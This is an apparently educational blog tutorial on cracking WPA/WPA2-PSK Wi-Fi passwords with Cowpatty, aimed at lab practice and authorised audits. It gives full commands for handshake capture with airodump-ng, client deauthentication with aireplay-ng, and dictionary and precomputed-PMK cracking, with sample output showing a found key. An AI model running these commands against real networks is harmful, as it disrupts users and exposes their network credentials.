Unlock cybersecurity expertise, protect digital frontiers, secure your future today! Join Now
Home
Cyber Security

Cracking WPA-PSK Wi-Fi Passwords with Cowpatty

Crack WPA/WPA2 Wi-Fi passwords using Cowpatty with captured handshakes and wordlists. Full command guide and output explained.

When it comes to Wi-Fi security assessments, especially targeting WPA-PSK (Wi-Fi Protected Access Pre-Shared Key) networks, one classic and lightweight tool stands out: Cowpatty. Though overshadowed by more advanced tools like Hashcat, Cowpatty is still a valuable educational and reconnaissance tool for understanding how WPA handshakes and password cracking work.

In this article, we’ll dive deep into what Cowpatty is, how it works, its practical usage, command breakdowns, expected outputs, and real-world scenarios. By the end, you’ll have a clear, professional grasp of Cowpatty’s workflow.

Cracking WPA-PSK Wi-Fi Passwords with Cowpatty

What is Cowpatty?

Cowpatty is a command-line tool used to brute-force WPA/WPA2-PSK passwords by analyzing captured 4-way handshakes. It performs dictionary-based attacks using precomputed or live password guesses.

Cowpatty was developed by Joshua Wright and is included in most security distros like Kali Linux and Parrot OS.

How WPA-PSK Cracking Works

Before diving into Cowpatty, let’s quickly understand the WPA-PSK cracking process:

  1. Capture the 4-way handshake between a client and the access point (AP).
  2. Extract the handshake from a .cap or .pcap file.
  3. Use the SSID and handshake to compute a Pairwise Master Key (PMK).
  4. Derive the Pairwise Transient Key (PTK) and validate against the captured handshake.
  5. Try password guesses (dictionary) until a match is found.

Cowpatty automates steps 3–5 using the captured handshake and a wordlist.

Installing Cowpatty

On Kali Linux, Cowpatty is preinstalled. If not, you can install it using:

sudo apt update
sudo apt install cowpatty

Verify installation:

cowpatty -h

Step-by-Step: Cracking WPA-PSK with Cowpatty

Step 1: Capture the WPA 4-Way Handshake

Use airodump-ng to capture the handshake (Cowpatty doesn't capture itself).

sudo airodump-ng wlan0mon --bssid 00:11:22:33:44:55 -c 6 -w wpa_handshake
  • --bssid: Target access point's MAC address.
  • -c: Channel.
  • -w: Write capture file (wpa_handshake.cap will be created).

Wait for a client to connect or deauth a client to force reauth:

sudo aireplay-ng -0 10 -a 00:11:22:33:44:55 wlan0mon

Now you should have a .cap file with the 4-way handshake.

Step 2: Crack the Password Using Cowpatty

Basic Usage:

cowpatty -f wordlist.txt -r wpa_handshake.cap -s MyWiFi

Command Breakdown:

  • -f wordlist.txt → Path to the dictionary file with password guesses.

  • -r wpa_handshake.cap → The captured 4-way handshake in .cap format.

  • -s MyWiFi → SSID (Wi-Fi name) of the target network.

Sample Output:

Cowpatty 4.6 - WPA-PSK dictionary attack.  

Collected all necessary data to mount the attack.  

Starting dictionary attack...  
104 keys tested (0.37 k/s)  

Key found!  
The PSK is "password123"  

107 passphrases tested in 3.29 seconds: 32.54 passphrases/second

This means Cowpatty found the correct passphrase after testing the dictionary.

Optional: Speed Up with Precomputed PMK File

If you’re attacking the same SSID repeatedly, you can precompute PMKs using genpmk.

Step 1: Create the PMK Hash File

genpmk -f wordlist.txt -d mypmkfile -s MyWiFi

Breakdown:

  • -f: Dictionary file.
  • -d: Output file to store precomputed hashes.
  • -s: SSID.

This will compute PMKs based on each word and store them for faster cracking.

Step 2: Use Cowpatty with Precomputed PMK

cowpatty -d mypmkfile -r wpa_handshake.cap -s MyWiFi

This is significantly faster than computing on the fly.

Sample Output (Using PMK):

Using precomputed hash file: mypmkfile  
Loaded 10000 passphrases from hash file  
Starting attack...  
Passphrase found: "password123"

Tips and Notes

  • Cowpatty only supports WPA/WPA2-PSK, not Enterprise.
  • It does not support GPU acceleration (use Hashcat or Aircrack-ng for that).
  • You must know the correct SSID or the attack won’t work.
  • A valid 4-way handshake is essential — check with Wireshark or tools like aircrack-ng.

Limitations of Cowpatty

| Limitation | Description | | | - | | Slow Cracking | No GPU support; CPU-based only | | Dictionary Only | No rule-based or hybrid attacks | | SSID Specific | PMKs are unique per SSID | | No Capture | Can't sniff handshakes itself |

Testing in a Lab Environment

Always use Cowpatty in a controlled lab with test networks you own. Unauthorized Wi-Fi cracking is illegal and unethical.

Set up your test network:

  1. Create a WPA2-PSK network named MyWiFi with password password123.
  2. Capture handshake using airodump-ng.
  3. Use Cowpatty with a wordlist containing password123.

Real-World Use Case

Imagine you're a penetration tester performing a Wi-Fi security audit for a client. The target office uses a weak pre-shared key. You:

  1. Use airodump-ng to capture a handshake.
  2. Try Cowpatty with their default password list.
  3. Crack it in seconds.
  4. Recommend a complex passphrase and enterprise-level WPA2 authentication.

Summary

Step Description
1. Capture Handshake Use airodump-ng and aireplay-ng
2. Run Cowpatty With or without precomputed PMKs
3. Validate Success Look for “Key found!”
4. Report & Secure Suggest better Wi-Fi security practices

Conclusion

Cowpatty is a simple, yet effective tool for understanding the fundamentals of WPA/WPA2 password cracking. While not the fastest or most powerful, it plays a crucial educational role in Wi-Fi security analysis.

If you're learning Wi-Fi penetration testing or teaching students about WPA vulnerabilities, Cowpatty offers a focused, realistic, and hands-on way to demonstrate how insecure passwords can be brute-forced using captured handshakes.